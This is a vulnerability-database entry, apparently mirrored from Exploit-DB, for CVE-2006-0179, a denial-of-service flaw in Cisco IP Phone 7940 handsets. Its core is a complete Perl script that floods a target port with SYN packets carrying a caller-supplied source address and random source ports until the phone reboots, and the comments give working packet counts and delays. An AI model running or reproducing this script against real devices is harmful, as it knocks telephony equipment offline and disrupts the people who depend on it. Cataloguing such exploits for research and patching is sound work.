ID

VAR-E-200601-0305


CVE

cve_id:CVE-2006-0179

Trust: 1.6

sources: EXPLOIT-DB: 1411 // EDBNET: 25845

EDB ID

1411


TITLE

Cisco IP Phone 7940 - Reboot (Denial of Service) - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 1411

DESCRIPTION

Cisco IP Phone 7940 - Reboot (Denial of Service). CVE-22469CVE-2006-0179 . dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 1411

AFFECTED PRODUCTS

vendor:ciscomodel:ip phonescope:eqversion:7940

Trust: 1.0

sources: EXPLOIT-DB: 1411

EXPLOIT

#!/usr/bin/perl
# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this.
# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my
# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
# protocol - this is not for the SIP firmware.

use Net::RawIP;
use Time::HiRes;
$pkt = new Net::RawIP;
die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]);
$pkt->set({
ip => {
saddr => $ARGV[0],
daddr => $ARGV[1]
},
tcp=> { dest => $ARGV[2],
syn => 1,
seq => 0,
ack => 0}
});
for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; };

# milw0rm.com [2006-01-10]

Trust: 1.0

sources: EXPLOIT-DB: 1411

EXPLOIT LANGUAGE

pl

Trust: 0.6

sources: EXPLOIT-DB: 1411

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 1411

TYPE

Reboot (Denial of Service)

Trust: 1.0

sources: EXPLOIT-DB: 1411

CREDITS

kokanin

Trust: 0.6

sources: EXPLOIT-DB: 1411

EXTERNAL IDS

db:NVDid:CVE-2006-0179

Trust: 1.6

db:EXPLOIT-DBid:1411

Trust: 1.6

db:EDBNETid:25845

Trust: 0.6

sources: EXPLOIT-DB: 1411 // EDBNET: 25845

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2006-0179

Trust: 1.6

url:https://www.exploit-db.com/exploits/1411/

Trust: 0.6

sources: EXPLOIT-DB: 1411 // EDBNET: 25845

SOURCES

db:EXPLOIT-DBid:1411
db:EDBNETid:25845

LAST UPDATE DATE

2022-07-27T09:48:46.609000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:1411date:2006-01-10T00:00:00
db:EDBNETid:25845date:2006-01-10T00:00:00